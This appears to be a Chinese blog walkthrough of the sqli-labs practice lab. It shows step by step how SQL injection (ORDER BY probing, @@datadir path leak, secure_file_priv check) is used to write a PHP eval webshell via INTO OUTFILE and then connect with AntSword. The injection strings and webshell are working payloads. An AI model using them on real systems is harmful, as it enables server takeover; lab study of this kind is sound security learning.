sqli-labs访问时遇到的问题
有时候会出现如下情况,是php高版本不兼容这个函数,勾选成成老版本的php就好了
SQL注入中上传getshell
(不咋会利用SQL注入上传shell,这边用sqli-labs/less-7练习以及学习)
参考文章:https://mp.weixin.qq.com/s/1D0qxqU8_yIn_59PK-n3AQ
https://blog.csdn.net/m0_46315342/article/details/106557552
先正常找到注入点
发现盲注成功
利用order by查看列数
order by 3 提示You are in...use outfile...(正确的显示)
order by 4 提示You have an error in your SQL(错误的显示)
说明列数为3
尝试再爆个显示位
发现没有回显
这边就可以尝试利用sql注入来写入getshell
但是我们现在还不知道路径,可以先爆个路径出来(由于less7是没有回显的)可以利用前面的关卡爆一个,我这边用less1来爆一个)
这边已经利用order by知道列数为3,利用datadir爆出数据库路径
?id=-1' union select 1,2,@@datadir --+
datadir爆出的是数据库所在位置,网站一般被存放在www文件下
所以可以推测出sqli-labs网站所在路径为
C:/phpstudy_pro/WWW
想要写入Getshell,先测试一下是否具有读写权限
?id=-1' union select 1,2,@@secure_file_priv--+
爆出来发现secure_file_priv值为空,也就是可以写入
也可以测试一下是否有读取权限(可选)
?id=-1' or (select count(*) from mysql.user)>0 --+
正常返回也就是有读写权限
继续回到less7,先写入点东西测试一下
?id=1')) union select 1,2,3 into outfile "C:/phpstudy_pro/WWW/a.txt" --+补充:C:/phpstudy_pro/WWW/a.txt中的/是所有系统支持的
也可以用\,这个\符号是Windows系统支持的,不过这边写入的时候用\要用反斜杠来防止系统当作转义符处理
例:C:\\phpstudy_pro\\WWW\\a.txt
虽然显示有错误,但是访问发现写入成功
尝试写入一句话木马
?id=1')) union select 1,2,"<?php @Eval($_POST[cmd])?>" into outfile "C:/phpstudy_pro/WWW/a.php" --+
访问发现没有写入的php,由于php属于后端语言,前端没法查看,直接在靶场后端查看一下,发现已经上传成功
然后利用webshell管理器工具连接(我这边用的是蚁剑)
